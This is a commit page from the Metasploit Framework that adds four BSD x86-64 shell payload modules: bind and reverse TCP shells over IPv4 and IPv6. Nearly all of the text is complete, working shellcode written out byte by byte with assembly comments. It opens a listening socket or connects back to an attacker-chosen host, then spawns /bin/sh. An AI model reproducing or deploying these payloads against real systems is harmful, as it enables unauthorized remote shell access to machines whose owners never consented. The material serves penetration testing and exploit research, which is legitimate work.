Skip to content

Commit a0539cd

Browse files
earthquakeearthquake
committed
new x64 bsd shellcodes (bind/reverse) ipv4/6. ipv4 shells are smaller than
the existing one.
1 parent 5ac97d1 commit a0539cd

File tree

4 files changed

+335
-0
lines changed

4 files changed

+335
-0
lines changed

modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb

Lines changed: 84 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,84 @@
1+
##
2+
# This module requires Metasploit: http://metasploit.com/download
3+
# Current source: https://github.com/rapid7/metasploit-framework
4+
##
5+
6+
require 'msf/core'
7+
require 'msf/core/handler/bind_tcp'
8+
require 'msf/base/sessions/command_shell'
9+
require 'msf/base/sessions/command_shell_options'
10+
11+
module Metasploit3
12+
13+
include Msf::Payload::Single
14+
include Msf::Payload::Bsd
15+
include Msf::Sessions::CommandShellOptions
16+
17+
def initialize(info = {})
18+
super(merge_info(info,
19+
'Name' => 'BSD x64 Command Shell, Bind TCP Inline (IPv6)',
20+
'Description' => 'Listen for a connection and spawn a command shell over IPv6',
21+
'Author' => 'Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>',
22+
'References' => ['URL', 'https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_ipv6_bind_tcp.asm.c'],
23+
'License' => MSF_LICENSE,
24+
'Platform' => 'bsd',
25+
'Arch' => ARCH_X86_64,
26+
'Handler' => Msf::Handler::BindTcp,
27+
'Session' => Msf::Sessions::CommandShellUnix,
28+
'Payload' =>
29+
{
30+
'Offsets' =>
31+
{
32+
'LPORT' => [ 20, 'n' ],
33+
},
34+
'Payload' =>
35+
"\x6a\x61" +# pushq $0x61 #
36+
"\x58" +# pop %rax #
37+
"\x99" +# cltd #
38+
"\x6a\x1c" +# pushq $0x1c #
39+
"\x5f" +# pop %rdi #
40+
"\x6a\x01" +# pushq $0x1 #
41+
"\x5e" +# pop %rsi #
42+
"\x0f\x05" +# syscall #
43+
"\x48\x97" +# xchg %rax,%rdi #
44+
"\x52" +# push %rdx #
45+
"\x52" +# push %rdx #
46+
"\x52" +# push %rdx #
47+
"\x68\x00\x1c\x11\x5c" +# pushq $0x5c111c00 #
48+
"\x48\x89\xe6" +# mov %rsp,%rsi #
49+
"\x6a\x1c" +# pushq $0x1c #
50+
"\x5a" +# pop %rdx #
51+
"\x04\x4c" +# add $0x4c,%al #
52+
"\x0f\x05" +# syscall #
53+
"\x48\x31\xf6" +# xor %rsi,%rsi #
54+
"\x6a\x6a" +# pushq $0x6a #
55+
"\x58" +# pop %rax #
56+
"\x0f\x05" +# syscall #
57+
"\x99" +# cltd #
58+
"\x04\x1e" +# add $0x1e,%al #
59+
"\x0f\x05" +# syscall #
60+
"\x48\x89\xc7" +# mov %rax,%rdi #
61+
"\x6a\x5a" +# pushq $0x5a #
62+
"\x58" +# pop %rax #
63+
"\x0f\x05" +# syscall #
64+
"\xff\xc6" +# inc %esi #
65+
"\x04\x5a" +# add $0x5a,%al #
66+
"\x0f\x05" +# syscall #
67+
"\xff\xc6" +# inc %esi #
68+
"\x04\x59" +# add $0x59,%al #
69+
"\x0f\x05" +# syscall #
70+
"\x52" +# push %rdx #
71+
"\x48\xbf\x2f\x2f\x62" +# mov "//b" #
72+
"\x69\x6e\x2f\x73\x68" +# mov "in/sh",%rdi #
73+
"\x57" +# push %rdi #
74+
"\x48\x89\xe7" +# mov %rsp,%rdi #
75+
"\x52" +# push %rdx #
76+
"\x57" +# push %rdi #
77+
"\x48\x89\xe6" +# mov %rsp,%rsi #
78+
"\x04\x39" +# add $0x39,%al #
79+
"\x0f\x05" # syscall #
80+
}
81+
))
82+
end
83+
84+
end

modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb

Lines changed: 83 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,83 @@
1+
##
2+
# This module requires Metasploit: http://metasploit.com/download
3+
# Current source: https://github.com/rapid7/metasploit-framework
4+
##
5+
6+
require 'msf/core'
7+
require 'msf/core/handler/bind_tcp'
8+
require 'msf/base/sessions/command_shell'
9+
require 'msf/base/sessions/command_shell_options'
10+
11+
module Metasploit3
12+
13+
include Msf::Payload::Single
14+
include Msf::Payload::Bsd
15+
include Msf::Sessions::CommandShellOptions
16+
17+
def initialize(info = {})
18+
super(merge_info(info,
19+
'Name' => 'BSD x64 Command Shell, Bind TCP Inline',
20+
'Description' => 'Listen for a connection and spawn a command shell',
21+
'Author' => 'Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>',
22+
'References' => ['URL', 'https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_bind_tcp.asm.c'],
23+
'License' => MSF_LICENSE,
24+
'Platform' => 'bsd',
25+
'Arch' => ARCH_X86_64,
26+
'Handler' => Msf::Handler::BindTcp,
27+
'Session' => Msf::Sessions::CommandShellUnix,
28+
'Payload' =>
29+
{
30+
'Offsets' =>
31+
{
32+
'LPORT' => [ 18, 'n' ],
33+
},
34+
'Payload' =>
35+
"\x6a\x61" +# pushq $0x61 #
36+
"\x58" +# pop %rax #
37+
"\x99" +# cltd #
38+
"\x6a\x02" +# pushq $0x2 #
39+
"\x5f" +# pop %rdi #
40+
"\x6a\x01" +# pushq $0x1 #
41+
"\x5e" +# pop %rsi #
42+
"\x0f\x05" +# syscall #
43+
"\x48\x97" +# xchg %rax,%rdi #
44+
"\x52" +# push %rdx #
45+
"\x68\x00\x02\x11\x5c" +# pushq $0x5c110200 #
46+
"\x48\x89\xe6" +# mov %rsp,%rsi #
47+
"\x6a\x10" +# pushq $0x10 #
48+
"\x5a" +# pop %rdx #
49+
"\x04\x66" +# add $0x66,%al #
50+
"\x0f\x05" +# syscall #
51+
"\x48\x31\xf6" +# xor %rsi,%rsi #
52+
"\x6a\x6a" +# pushq $0x6a #
53+
"\x58" +# pop %rax #
54+
"\x0f\x05" +# syscall #
55+
"\x99" +# cltd #
56+
"\x04\x1e" +# add $0x1e,%al #
57+
"\x0f\x05" +# syscall #
58+
"\x48\x89\xc7" +# mov %rax,%rdi #
59+
"\x6a\x5a" +# pushq $0x5a #
60+
"\x58" +# pop %rax #
61+
"\x0f\x05" +# syscall #
62+
"\xff\xc6" +# inc %esi #
63+
"\x04\x5a" +# add $0x5a,%al #
64+
"\x0f\x05" +# syscall #
65+
"\xff\xc6" +# inc %esi #
66+
"\x04\x59" +# add $0x59,%al #
67+
"\x0f\x05" +# syscall #
68+
"\x52" +# push %rdx #
69+
"\x48\xbf\x2f\x2f" +# mov "//" #
70+
"\x62\x69\x6e\x2f" +# "bin/sh" #
71+
"\x73\x68" +# mov $0x68732f6e69622f2f,%rdi #
72+
"\x57" +# push %rdi #
73+
"\x48\x89\xe7" +# mov %rsp,%rdi #
74+
"\x52" +# push %rdx #
75+
"\x57" +# push %rdi #
76+
"\x48\x89\xe6" +# mov %rsp,%rsi #
77+
"\x04\x39" +# add $0x39,%al #
78+
"\x0f\x05" # syscall #
79+
}
80+
))
81+
end
82+
83+
end

modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb

Lines changed: 90 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,90 @@
1+
##
2+
# This module requires Metasploit: http://metasploit.com/download
3+
# Current source: https://github.com/rapid7/metasploit-framework
4+
##
5+
6+
require 'msf/core'
7+
require 'msf/core/handler/reverse_tcp'
8+
require 'msf/base/sessions/command_shell'
9+
require 'msf/base/sessions/command_shell_options'
10+
11+
module Metasploit3
12+
13+
include Msf::Payload::Single
14+
include Msf::Payload::Bsd
15+
include Msf::Sessions::CommandShellOptions
16+
17+
def initialize(info = {})
18+
super(merge_info(info,
19+
'Name' => 'BSD x64 Command Shell, Reverse TCP Inline (IPv6)',
20+
'Description' => 'Connect back to attacker and spawn a command shell over IPv6',
21+
'Author' => 'Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>',
22+
'References' => ['URL', 'https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_ipv6_reverse_tcp.asm.c'],
23+
'License' => MSF_LICENSE,
24+
'Platform' => 'bsd',
25+
'Arch' => ARCH_X86_64,
26+
'Handler' => Msf::Handler::ReverseTcp,
27+
'Session' => Msf::Sessions::CommandShellUnix,
28+
'Payload' =>
29+
{
30+
'Offsets' =>
31+
{
32+
'LHOST' => [ 85, 'ADDR6' ],
33+
'LPORT' => [ 79, 'n' ],
34+
'SCOPEID' => [ 101, 'V' ]
35+
},
36+
'Payload' =>
37+
"\x6a\x61" +# pushq $0x61 #
38+
"\x58" +# pop %rax #
39+
"\x99" +# cltd #
40+
"\x6a\x1c" +# pushq $0x1c #
41+
"\x5f" +# pop %rdi #
42+
"\x6a\x01" +# pushq $0x1 #
43+
"\x5e" +# pop %rsi #
44+
"\x0f\x05" +# syscall #
45+
"\x48\x97" +# xchg %rax,%rdi #
46+
"\x04\x3e" +# add $0x3e,%al #
47+
"\x0f\x05" +# syscall #
48+
"\xff\xc6" +# inc %esi #
49+
"\x04\x59" +# add $0x59,%al #
50+
"\x0f\x05" +# syscall #
51+
"\xff\xce" +# dec %esi #
52+
"\xff\xce" +# dec %esi #
53+
"\x04\x58" +# add $0x58,%al #
54+
"\x0f\x05" +# syscall #
55+
"\xe9\x23\x00\x00\x00" +# jmpq <forth> #
56+
# back:
57+
"\x5e" +# pop %rsi #
58+
"\x6a\x1c" +# pushq $0x1c #
59+
"\x5a" +# pop %rdx #
60+
"\x66\x83\xc0\x62" +# add $0x62,%ax #
61+
"\x0f\x05" +# syscall #
62+
"\x99" +# cltd #
63+
"\x52" +# push %rdx #
64+
"\x48\xbf\x2f\x2f\x62" +# mov "//b" #
65+
"\x69\x6e\x2f\x73\x68" +# "in/sh",%rdi #
66+
"\x57" +# push %rdi #
67+
"\x48\x89\xe7" +# mov %rsp,%rdi #
68+
"\x52" +# push %rdx #
69+
"\x57" +# push %rdi #
70+
"\x48\x89\xe6" +# mov %rsp,%rsi #
71+
"\x04\x3b" +# add $0x3b,%al #
72+
"\x0f\x05" +# syscall #
73+
# forth:
74+
"\xe8\xd8\xff\xff\xff" +# callq <back> #
75+
# sockaddr_in6
76+
"\x00\x1c\x11\x5c" +# AF_INET6+port #
77+
"\x00\x00\x00\x00" +# no-one-cares #
78+
"\x00\x00\x00\x00" +# IPv6- #
79+
"\x00\x00\x00\x00" +# addr- #
80+
"\x00\x00\x00\x00" +# in- #
81+
"\x00\x00\x00\x01" +# 16 bytes #
82+
"\x00\x00\x00\x00" # Scope ID #
83+
}
84+
))
85+
register_options([
86+
OptInt.new('SCOPEID', [false, "IPv6 scope ID, for link-local addresses", 0])
87+
])
88+
end
89+
90+
end

modules/payloads/singles/bsd/x64/shell_reverse_tcp_small.rb

Lines changed: 78 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,78 @@
1+
##
2+
# This module requires Metasploit: http://metasploit.com/download
3+
# Current source: https://github.com/rapid7/metasploit-framework
4+
##
5+
6+
require 'msf/core'
7+
require 'msf/core/handler/reverse_tcp'
8+
require 'msf/base/sessions/command_shell'
9+
require 'msf/base/sessions/command_shell_options'
10+
11+
module Metasploit3
12+
13+
include Msf::Payload::Single
14+
include Msf::Payload::Bsd
15+
include Msf::Sessions::CommandShellOptions
16+
17+
def initialize(info = {})
18+
super(merge_info(info,
19+
'Name' => 'BSD x64 Command Shell, Reverse TCP Inline',
20+
'Description' => 'Connect back to attacker and spawn a command shell',
21+
'Author' => 'Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>',
22+
'References' => ['URL', 'https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_reverse_tcp.asm.c'],
23+
'License' => MSF_LICENSE,
24+
'Platform' => 'bsd',
25+
'Arch' => ARCH_X86_64,
26+
'Handler' => Msf::Handler::ReverseTcp,
27+
'Session' => Msf::Sessions::CommandShellUnix,
28+
'Payload' =>
29+
{
30+
'Offsets' =>
31+
{
32+
'LHOST' => [ 39, 'ADDR' ],
33+
'LPORT' => [ 37, 'n' ],
34+
},
35+
'Payload' =>
36+
"\x6a\x61" +# pushq $0x61 #
37+
"\x58" +# pop %rax #
38+
"\x99" +# cltd #
39+
"\x6a\x02" +# pushq $0x2 #
40+
"\x5f" +# pop %rdi #
41+
"\x6a\x01" +# pushq $0x1 #
42+
"\x5e" +# pop %rsi #
43+
"\x0f\x05" +# syscall #
44+
"\x48\x97" +# xchg %rax,%rdi #
45+
"\x04\x58" +# add $0x58,%al #
46+
"\x0f\x05" +# syscall #
47+
"\xff\xc6" +# inc %esi #
48+
"\x04\x59" +# add $0x59,%al #
49+
"\x0f\x05" +# syscall #
50+
"\xff\xce" +# dec %esi #
51+
"\xff\xce" +# dec %esi #
52+
"\x04\x58" +# add $0x58,%al #
53+
"\x0f\x05" +# syscall #
54+
"\x52" +# push %rdx #
55+
"\x48\xbb\x00\x02\x11" +# mov ... #
56+
"\x5c\x7f\x00\x00\x01" +# mov $0x100007f5c110200,%rbx #
57+
"\x53" +# push %rbx #
58+
"\x48\x89\xe6" +# mov %rsp,%rsi #
59+
"\x6a\x10" +# pushq $0x10 #
60+
"\x5a" +# pop %rdx #
61+
"\x66\x83\xc0\x62" +# add $0x62,%ax #
62+
"\x0f\x05" +# syscall #
63+
"\x99" +# cltd #
64+
"\x52" +# push %rdx #
65+
"\x48\xbf\x2f\x2f\x62" +# mov "//b" #
66+
"\x69\x6e\x2f\x73\x68" +# "in/sh", %rdi #
67+
"\x57" +# push %rdi #
68+
"\x48\x89\xe7" +# mov %rsp,%rdi #
69+
"\x52" +# push %rdx #
70+
"\x57" +# push %rdi #
71+
"\x48\x89\xe6" +# mov %rsp,%rsi #
72+
"\x04\x3b" +# add $0x3b,%al #
73+
"\x0f\x05" # syscall #
74+
}
75+
))
76+
end
77+
78+
end

0 commit comments

Comments
 (0)